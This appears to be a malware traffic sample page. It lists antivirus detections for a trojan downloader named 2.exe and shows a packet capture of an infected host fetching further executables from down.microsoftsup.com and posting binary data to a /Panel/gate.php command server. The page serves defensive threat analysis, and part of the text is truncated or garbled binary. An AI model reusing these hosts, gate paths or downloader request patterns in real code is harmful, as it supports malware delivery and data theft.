microsoftsup.com POST /gate.php Trojan Malware Downloader PCAP file download traffic sample

SHA256: 55754d7bc221d58cebc24daeb3476fa2dbfdaf6ab75e9d3a30456dd5cbf589e5
File name: 2.exe
Detection ratio: 49 / 56
Analysis date: 2016-11-16 03:38:39 UTC ( 0 minutes ago )
ALYac Trojan.Generic.19684864 20161116
AVG Win32/Blacked 20161116
AVware Trojan.Win32.Generic!BT 20161116
Ad-Aware Trojan.Generic.19684864 20161116
AegisLab Troj.W32.Generic!c 20161116
AhnLab-V3 Trojan/Win32.Generic.N2111031230 20161116
Antiy-AVL Trojan[:HEUR]/Win32.AGeneric 20161116
Arcabit Trojan.Generic.D12C5E00 20161116
Avast Win32:Adware-gen [Adw] 20161116
Avira (no cloud) TR/Black.Gen2 20161116
Baidu Win32.Packed.VMProtect.a 20161115
BitDefender Trojan.Generic.19684864 20161116
Bkav HW32.Packed.509F 20161112
CAT-QuickHeal TrojanPWS.Fareit 20161115
ClamAV Win.Trojan.Generic-1750 20161116
Comodo UnclassifiedMalware 20161116
CrowdStrike Falcon (ML) malicious_confidence_100% (W) 20161024
Cyren

 

2016-11-15 19:21:22.301485 IP 192.168.1.102.53489 > 59.188.68.200.80: Flags [P.], seq 0:294, ack 1, win 256, length 294: HTTP: GET /down/2.exe HTTP/1.1
E..NF.@…p….f;.D….P…}.p.sP…H”..GET /down/2.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-usmicrosoftsup.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: down.microsoftsup.com
Connection: Keep-Alive

2016-11-15 19:21:22.559324 IP 192.168.1.102.53489 > 59.188.68.200.80: Flags [.], ack 1, win 256, options [nop,nop,sack 1 {1461:2921}], length 0
E..4F.@…q….f;.D….P…..p.s………..

E..(Gq@…p….f;.D….PF..o..}^P…”………
2016-11-15 19:21:36.592725 IP 192.168.1.102.53491 > 59.188.68.200.80: Flags [P.], seq 0:272, ack 1, win 256, length 272: HTTP: POST /Panel/gate.php HTTP/1.0
E..8Gr@…o….f;.D….PF..o..}^P….|..POST /Panel/gate.php HTTP/1.0
Host: a.microsoftsup.com
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 337
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)


E..(Gw@…p….f;.D….P^……5P………….
2016-11-15 19:21:37.954398 IP 192.168.1.102.53492 > 59.188.68.200.80: Flags [P.], seq 0:183, ack 1, win 256, length 183: HTTP: GET /down/1.exe HTTP/1.0
E…Gx@…p….f;.D….P^……5P…….GET /down/1.exe HTTP/1.0
Host: down.microsoftsup.com
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)